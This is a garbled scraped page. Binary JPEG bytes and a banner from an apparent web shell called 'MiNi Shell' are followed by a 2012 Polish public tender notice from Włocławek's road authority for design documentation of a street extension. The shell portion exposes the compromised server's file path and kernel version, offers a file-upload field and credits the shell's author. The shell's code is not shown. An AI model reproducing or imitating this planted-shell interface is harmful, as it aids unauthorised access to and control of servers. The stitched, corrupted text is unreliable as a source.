JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120529/178452-N-2012.html

<p class="kh_header"><b>Włocławek: Rozbudowa ul. Stodolnej na odcinku od ul. Towarowej do ul. Królewieckiej wraz z infrastrukturą towarzyszącą - opracowanie dokumentacji projektowej</b><br>
<b>Numer ogłoszenia: 178452 - 2012; data zamieszczenia: 29.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Dróg , ul. Zielna 13/21, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 4121323, faks 054 4121323.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzdwloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa ul. Stodolnej na odcinku od ul. Towarowej do ul. Królewieckiej wraz z infrastrukturą towarzyszącą - opracowanie dokumentacji projektowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia  obejmuje opracowanie opisu przedmiotu zamówienia na roboty budowlane zgodnie z art. 29 i art. 30 ustawy z dnia 29 stycznia 2004 roku prawo zamówień publicznych (tj. Dz. U. z 2010r nr 113, poz. 759 ze zm.).

1.	Opis ogólny przedmiotu zamówienia.
1.1.	Przedmiot niniejszego zamówienia obejmuje: opracowanie kompletnej dokumentacji projektowej niezbędnej do prawidłowego przygotowania, wykonania i rozliczenia inwestycji polegającej na:
-	rozbudowie ulicy Stodólnej na odcinku od skrzyżowania z ul. Targową do skrzyżowania z ul. Królewiecką,
-	przebudowie skrzyżowania ulicy Stodólnej z ulicami Królewiecką i Cyganka,
-	przebudowie skrzyżowania ulicy Stodólnej z ulicą Targową,
-	budowie ulicy łączącej ul. Towarową z ul. Targową,
-	wykonaniu robót rozbiórkowych budynku wolnostojącego trzykondygnacyjnego,
-	budowie)przebudowie infrastruktury towarzyszącej,
w ramach zadania pn. Rozbudowa ul. Stodólnej na odcinku od ul. Towarowej do ul. Królewieckiej wraz z infrastrukturą towarzyszącą.
1.2.	Przedstawiona przez Wykonawcę i zaakceptowana przez Zamawiającego Koncepcja rozwiązań projektowych układu drogowego, wraz z nowym przebiegiem linii rozgraniczających, będzie podstawą do wykonania projektów podziału nieruchomości. Uzyskanie dokumentacji geodezyjnej w powyższym zakresie należy do Wykonawcy. 
Dokumentacja opracowana w ramach niniejszego zamówienia posłuży do uzyskania    decyzji o zezwoleniu na realizację inwestycji drogowej w trybie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (t.j. Dz. U. z 2008 r. nr 193 poz. 1194 ze zmianami).
	Szczegółowy wykaz żądanych opracowań:

1)	Mapa do celów projektowych w formie analogowej (diazo) i numerycznej (w państwowym układzie współrzędnych 2000) z rozszerzeniem  DWG. Mapa w formie numerycznej winna być aktualna na dzień wydania.  Płyta CD lub DVD opisana. Ponadto Wykonawca, w toku sporządzania dokumentacji związanej z mapą do celów projektowych, winien sporządzić wykazy zmian gruntowych dla działek, które są zajęte pod drogę w sposób faktyczny, a w operacie ewidencji gruntów 
i budynków mają określony użytek inny niż (dr). 
2)	Inwentaryzacja obiektów oraz uzbrojenia terenu. 
3)	Inwentaryzacja zadrzewienia w obrębie planowanych działań i plan wyrębu.
4)	Dokumentacja geotechniczna.
5)	Koncepcja rozbudowy)budowy ulic wraz z wariantowaniem lokalizacyjnym.
6)	Operat wodnoprawny pod potrzeby uzyskania pozwolenia wodnoprawnego na wykonanie urządzeń wodnych i odprowadzenie wód - w razie potrzeby.
7)	Projekt urządzeń ochrony środowiska - w razie potrzeby.
8)	Materiały niezbędne do uzyskania opinii oraz do wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej. 
9)	Projekt - określenie zmian w dotychczasowej infrastrukturze zagospodarowania terenu (niezbędne do wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej zgodnie z art. 5 ust. 1 pkt 4 ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych - Dz. U.  z 2008 r. nr 193, poz. 1194 ze zm.).
10)	Analiza powiązania drogi z innymi drogami.
11)	Projekt zagospodarowania terenu z określeniem linii rozgraniczających.
12)	Projekt branży drogowej: budowlany i wykonawczy.
13)	Projekt stałej organizacji ruchu.
14)	Projekt branży elektrycznej dla oświetlenia ulicznego: budowlany i wykonawczy.
15)	Projekt branży wodno - kanalizacyjnej: budowlany i wykonawczy.
16)	Projekty eliminujące kolizje z projektowanym układem drogowym: budowlane i wykonawcze.
17)	Projekt robót rozbiórkowych, w tym budynku wolnostojącego trzykondygnacyjnego.
18)	Projekt gospodarki materiałami rozbiórkowymi.
19)	Projekt zieleni.
20)	Informacje BIOZ.
21)	Przedmiary robót (wszystkich branż)
22)	Kosztorysy inwestorskie (wszystkich branż) wraz z aktualizacją.
23)	Kosztorysy ofertowe (wszystkich branż).
24)	Szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych (wszystkich branż).
25)	Projekty podziału nieruchomości oraz dokumentacja niezbędna do wprowadzenia zmian w księgach wieczystych.
26)	Dokumentacja z inspekcji istniejącej kanalizacji deszczowej, do której zaprojektowano odprowadzenie wód opadowych z pasa drogowego. Dokumentacja musi zawierać nagranie z kamery monitorującej kanały, zapisane na płycie CD lub DVD. Płyta CD lub DVD opisana..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1000,00zl</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie precyzuje w tym zakresie żadnych wymagań, ktorych spełnienie Wykonawca zobowiązany jest wykazać w sposób szczgolny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonać w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie;
 - przynajmniej jedną usługę polegającą na sporządzeniu dokumentacji projektowej 
dla budowy, rozbudowy lub przebudowy drogi (wraz z infrastrukturą towarzyszącą) 
o kategorii Z.
Na potwierdzenie powyższego należy załączyć dokument potwierdzający, że usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie precyzuje w tym zakresie żadnych wymagań, ktorych spełnienie Wykonawca zobowiązany jest wykazać w sposób szczgolny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazać się osobami oraz informacjami o podstawie do dysponowania tymi osobami, które będą uczestniczyć w wykonywaniu zamówienia:
do projektowania bez ograniczeń i sprawdzania projektów architektoniczno-budowlanych (zgodnie z dyspozycją art. 12 ustawy - Prawo budowlane z dnia 7 lipca 1994 r. tekst jednolity Dz. U. z 2006r. nr 156, poz. 1118, z późn. zm) minimum po 1 osobie w specjalnościach:
1.	drogowej posiadający: uprawnienia budowlane do projektowania bez ograniczeń i sprawdzania projektów architektoniczno-budowalnych w specjalności  drogowej, 2-letnie doświadczenie zawodowe, 
2.	konstrukcyjno-budowlanej posiadający: uprawnienia budowlane do projektowania bez ograniczeń i sprawdzania projektów architektoniczno-budowalnych w specjalności  konstrukcyjo-budowlanej, 2-letnie doświadczenie zawodowe, 
3.	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych  posiadający: uprawnienia budowlane do projektowania bez ograniczeń i sprawdzania projektów architektoniczno-budowalnych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, roczne doświadczenie zawodowe, 
4.	telekomunikacyjnej posiadający: uprawnienia budowlane do projektowania bez ograniczeń i  sprawdzania projektów architektoniczno-budowalnych w specjalności telekomunikacyjnej, roczne doświadczenie zawodowe, 
5.	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - posiadający: uprawnienia budowlane do projektowania bez ograniczeń i sprawdzania projektów architektoniczno-budowalnych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, roczne doświadczenie zawodowe, 
6.	Projektant branży zieleń posiadający minimum średnie wykształcenie ogrodnicze lub pokrewne - minimum 1 osoba.

Na potwierdzenie powyższego należy załączyć oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia - zał. nr 8, 

Dopuszcza się łączenie funkcji projektantów poszczególnych branż wymienionych powyżej, pod warunkiem wykazania się niezbędnymi uprawnieniami do projektowania dla każdej branży.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie precyzuje w tym zakresie żadnych wymagań, ktorych spełnienie Wykonawca zobowiązany jest wykazać w sposób szczgolny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>załącznik nr 1 formularz ofertowy, załącznik nr 3 oświadczenie o spełnieniu warunkow udzialu w postepowaniu, pełnomocnictwo do podpisania oferty, jeżeli nie wynika ono z odrebnych dokumentow, np. z odpisu z rejestru, załącznik nr 9 formularz cenowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający dopuszcza możliwość wprowadzania zmian w umowie w stosunku
do treści oferty, które będą mogły być dokonane z powodu zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy lub w przypadku wystąpienia którejkolwiek z następujących sytuacji:
2.1.	udzielenie w trakcie realizacji umowy zamówień dodatkowych, związanych z realizacją zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia jej realizacji (powodujących konieczność jego wydłużenia),
2.2.	przedłużenie terminu zakończenia przedmiotu umowy może nastąpić w przypadkach:

1.	rozszerzenia zakresu projektu wynikającego z warunków gestorów sieci i decyzji administracyjnych,
2.	zwłoki instytucji opiniujących i uzgadniających ponad łączny czas wykonania przypisanych im czynności o czas równy tej zwłoce,
3.	wystąpienia okoliczności siły wyższej - jako siłę wyższą należy rozumieć zdarzenia niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej,
4.	pisemnego żądania wstrzymania prac skierowanego do Wykonawcy przez Zamawiającego o ile żądanie lub wydanie zakazów nie nastąpiło z przyczyn,
za które Wykonawca ponosi odpowiedzialność,
5.	wydania przez Wojewódzkiego Konserwatora Zabytków zaleceń / decyzji skutkujących koniecznością rozszerzenia zakresu czynności wykonywanych w ramach opracowania dokumentacji lub uzyskania dodatkowych uzgodnień;
6.	koniecznością koordynacji prac projektowych prowadzonych w ramach przedmiotowego zadania z pracami (projektowymi lub budowlanymi) prowadzonymi na rzecz Gminy Miasta Włocławek, jednostek podległych i spółek miejskich
7.	przedłużenie terminu zakończenia przedmiotu umowy może nastąpić wyłącznie przez zmianę umowy o zamówienie publiczne to jest aneks do umowy.
2.3.	Wprowadzenie zmian w dokumentacji projektowej w przypadku wystąpienia którejkolwiek sytuacji:
1.	            wprowadzenie zmian wynikających z zasad wiedzy technicznej;
2.	            wprowadzenie zmian jest możliwe wyłącznie w sytuacji, gdy nie spowoduje   
                   zwiększenia wynagrodzenia wykonawcy oraz nie wykroczy poza zakres  
                   zamówienia opisany w projekcie budowlanym.

2.4	        zmiany osób wymienionych w umowie po stronie którejkolwiek ze stron,
2.5	        rozszerzenie zakresu czynności wykonywanych w ramach opracowania dokumentacji,   
              wynikające z zaleceń lub decyzji Wojewódzkiego Konserwatora Zabytków.
2.6	        zmiana zakresu podwykonawstwa.

3.	Wszelkie zmiany umowy wymagają pod rygorem nieważności formy pisemnej 
i podpisania przez obie strony.
4.	Wszelkie zmiany do umowy mogą być wprowadzone w okolicznościach i na zasadach  jak powyżej wyłącznie przed zakończeniem terminu realizacji umowy.
5.	Z wnioskiem o zmianę treści umowy może wystąpić zarówno Wykonawca, jak
i Zamawiający.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzdwloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg ul. Zielna 13/21, 87-800 Wloclawek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2012 godzina 10:00, miejsce: Miejski Zarząd Dróg ul. Zielna 13/21, 87-800 Wloclawek pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com